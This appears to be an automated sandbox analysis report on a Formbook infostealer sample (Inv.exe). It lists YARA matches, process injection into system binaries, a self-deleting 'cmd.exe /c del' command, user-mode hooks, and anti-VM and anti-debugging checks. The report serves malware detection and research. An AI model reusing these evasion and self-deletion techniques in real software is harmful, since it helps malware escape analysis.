          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 01237021 appears 40 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0194B150 appears 35 times
          Source: C:\Users\user\Desktop\Inv.exeCode function: String function: 0123715C appears 370 times
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02E1B150 appears 66 times
          Source: Inv.exe, 00000000.00000003.670693601.000000001A516000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.710037557.0000000001BCF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
          Source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Inv.exe
          Source: Inv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@7/3
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO0_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: Kernel32.dll1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: User32.dll1_2_01231040
          Source: C:\Users\user\Desktop\Inv.exeCommand line argument: IEUCIZEO1_2_01231040
          Source: Inv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Inv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Inv.exeVirustotal: Detection: 39%
          Source: Inv.exeReversingLabs: Detection: 45%
          Source: C:\Users\user\Desktop\Inv.exeFile read: C:\Users\user\Desktop\Inv.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Inv.exeProcess created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'Jump to behavior
          Source: Inv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Inv.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_012391A5 push ecx; ret 0_2_012391B8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D0D2 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D0DB push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D085 push eax; ret 1_2_0041D0D8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D13C push eax; ret 1_2_0041D142
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041D1EF push ebp; ret 1_2_0041D6FD
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0040F345 push edi; retf 1_2_0040F34C
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0041E7C6 push edx; ret 1_2_0041E83E
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_012391A5 push ecx; ret 1_2_012391B8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0199D0D1 push ecx; ret 1_2_0199D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E6D0D1 push ecx; ret 4_2_02E6D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D085 push eax; ret 4_2_0036D0D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D0D2 push eax; ret 4_2_0036D0D8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D0DB push eax; ret 4_2_0036D142
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D13C push eax; ret 4_2_0036D142
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036D1EF push ebp; ret 4_2_0036D6FD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036DA9F push cs; iretd 4_2_0036DAAE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0035F345 push edi; retf 4_2_0035F34C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0036E7C6 push edx; ret 4_2_0036E83E

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Inv.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Windows\explorer.exe TID: 6700Thread sleep count: 65 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6700Thread sleep time: -130000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576Thread sleep count: 43 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576Thread sleep time: -86000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.686106576.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000002.1056063670.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.690969786.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Inv.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Inv.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01241B13
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_01236A00 mov eax, dword ptr fs:[00000030h]0_2_01236A00
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073E912 mov eax, dword ptr fs:[00000030h]0_2_0073E912
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073F1BE mov eax, dword ptr fs:[00000030h]0_2_0073F1BE
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073F181 mov eax, dword ptr fs:[00000030h]0_2_0073F181
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073F221 mov eax, dword ptr fs:[00000030h]0_2_0073F221
          Source: C:\Users\user\Desktop\Inv.exeCode function: 0_2_0073F369 mov eax, dword ptr fs:[00000030h]0_2_0073F369
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01236A00 mov eax, dword ptr fs:[00000030h]1_2_01236A00
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01972990 mov eax, dword ptr fs:[00000030h]1_2_01972990
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197A185 mov eax, dword ptr fs:[00000030h]1_2_0197A185
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196C182 mov eax, dword ptr fs:[00000030h]1_2_0196C182
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h]1_2_019C51BE
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h]1_2_019C51BE
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h]1_2_019C51BE
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h]1_2_019C51BE
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019761A0 mov eax, dword ptr fs:[00000030h]1_2_019761A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019761A0 mov eax, dword ptr fs:[00000030h]1_2_019761A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C69A6 mov eax, dword ptr fs:[00000030h]1_2_019C69A6
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h]1_2_0194B1E1
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h]1_2_0194B1E1
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h]1_2_0194B1E1
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019D41E8 mov eax, dword ptr fs:[00000030h]1_2_019D41E8
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949100 mov eax, dword ptr fs:[00000030h]1_2_01949100
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949100 mov eax, dword ptr fs:[00000030h]1_2_01949100
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949100 mov eax, dword ptr fs:[00000030h]1_2_01949100
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197513A mov eax, dword ptr fs:[00000030h]1_2_0197513A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197513A mov eax, dword ptr fs:[00000030h]1_2_0197513A
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov eax, dword ptr fs:[00000030h]1_2_01964120
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov eax, dword ptr fs:[00000030h]1_2_01964120
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov eax, dword ptr fs:[00000030h]1_2_01964120
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov eax, dword ptr fs:[00000030h]1_2_01964120
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01964120 mov ecx, dword ptr fs:[00000030h]1_2_01964120
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196B944 mov eax, dword ptr fs:[00000030h]1_2_0196B944
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0196B944 mov eax, dword ptr fs:[00000030h]1_2_0196B944
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B171 mov eax, dword ptr fs:[00000030h]1_2_0194B171
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194B171 mov eax, dword ptr fs:[00000030h]1_2_0194B171
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0194C962 mov eax, dword ptr fs:[00000030h]1_2_0194C962
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01949080 mov eax, dword ptr fs:[00000030h]1_2_01949080
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C3884 mov eax, dword ptr fs:[00000030h]1_2_019C3884
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C3884 mov eax, dword ptr fs:[00000030h]1_2_019C3884
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197F0BF mov ecx, dword ptr fs:[00000030h]1_2_0197F0BF
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197F0BF mov eax, dword ptr fs:[00000030h]1_2_0197F0BF
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197F0BF mov eax, dword ptr fs:[00000030h]1_2_0197F0BF
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019890AF mov eax, dword ptr fs:[00000030h]1_2_019890AF
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]1_2_019720A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]1_2_019720A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]1_2_019720A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]1_2_019720A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]1_2_019720A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h]1_2_019720A0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]1_2_019DB8D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov ecx, dword ptr fs:[00000030h]1_2_019DB8D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]1_2_019DB8D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]1_2_019DB8D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]1_2_019DB8D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h]1_2_019DB8D0
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019458EC mov eax, dword ptr fs:[00000030h]1_2_019458EC
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h]1_2_019C7016
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h]1_2_019C7016
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h]1_2_019C7016
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A14015 mov eax, dword ptr fs:[00000030h]1_2_01A14015
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_01A14015 mov eax, dword ptr fs:[00000030h]1_2_01A14015
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]1_2_0197002D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]1_2_0197002D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]1_2_0197002D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]1_2_0197002D
          Source: C:\Users\user\Desktop\Inv.exeCode function: 1_2_0197002D mov eax, dword ptr fs:[00000030h]1_2_0197002D
